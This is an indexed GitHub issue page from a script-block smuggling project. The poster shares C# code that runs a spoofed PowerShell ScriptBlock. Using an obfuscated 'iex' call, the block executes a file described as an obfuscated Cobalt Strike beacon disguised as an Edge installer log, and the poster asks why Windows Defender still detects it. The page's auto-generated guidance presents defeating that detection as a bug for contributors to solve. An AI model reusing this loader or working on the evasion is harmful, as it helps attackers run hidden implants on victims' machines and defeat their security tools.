BC-SECURITY / BC-SECURITY/ScriptBlock-Smuggling
Still be detected by wdfdr...
Dieses Issue hat noch niemand übernommen.
- Vorherrschende Sprache
- C#
- Sterne
- 96
- Forks
- 13
- PR-Merge-Kennzahlen
- Keine gemergten PRs in 30 T.
Beschreibung
A very nice anti-detection idea, however my sample still can be detected by Windows Defender, here is the demo code:
...
namespace ScriptSmuggling
{
public class Program
{
public static void Main()
{
// the msedge_installer.log is an obfuscated cobaltstrike beacon file (.ps1). it can be execute by iex
string script = @". ($pShOmE[4]+$PsHoMe[34]+'X') (cat C:\Windows\Temp\msedge_installer.log)";
ScriptBlock sb = BuildSpoofedBlock(script);
// Setup PowerShell runspace
using (Runspace runSpace = RunspaceFactory.CreateRunspace())
{
runSpace.Open();
using (PowerShell ps = PowerShell.Create())
{
ps.Runspace = runSpace;
ps.AddCommand("Invoke-Command")
.AddParameter("ScriptBlock", sb);
Collection<PSObject> results = ps.Invoke();
foreach (PSObject result in results)
{
Console.WriteLine(result);
}
// Display any errors from the error stream
foreach (ErrorRecord error in ps.Streams.Error)
{
Console.WriteLine("ERROR: " + error);
}
}
}
}
public static ScriptBlock BuildSpoofedBlock(string content)
{
...
}
}
}
Maybe the executableAst is still be check by wdfdr?
Beitragsleitfaden
Für dieses Repository ist kein Beitragsleitfaden indexiert
Erste Schritte
- Lies das ganze Issue und danach den Beitragsleitfaden des Projekts.
- Schreib ins Issue, dass du es übernimmst — das erspart doppelte Arbeit.
- Forke das Repository und arbeite in einem Branch.
- Öffne einen Pull Request, der die Issue-Nummer nennt.
Rechercherichtung
Es werden keine Repository-Dateien oder Tests genannt. Beginne damit, das bereitgestellte C#-Beispiel mit Windows Defender zu reproduzieren, und verfolge anschließend, wie der generierte ScriptBlock und executableAst verarbeitet werden; abgeschlossen ist die Untersuchung, wenn der Erkennungspfad identifiziert und eine bestätigte Lösung oder die verbleibende Einschränkung dokumentiert wurde.
Vom Indexierungsmodell aus dem Issue-Text verfasst.
Bewertung
- Tech-Stack
- csharp, powershell
- Bereich
- security
- Issue-Typ
- Bug
- Schwierigkeit
- 4/5
- Geschätzter Aufwand
- 3-5 Tage
- Aktivitätsstatus
- Veraltet
- Klarheit
- Muss geklärt werden
- Anfängerfreundlichkeit
- 25/100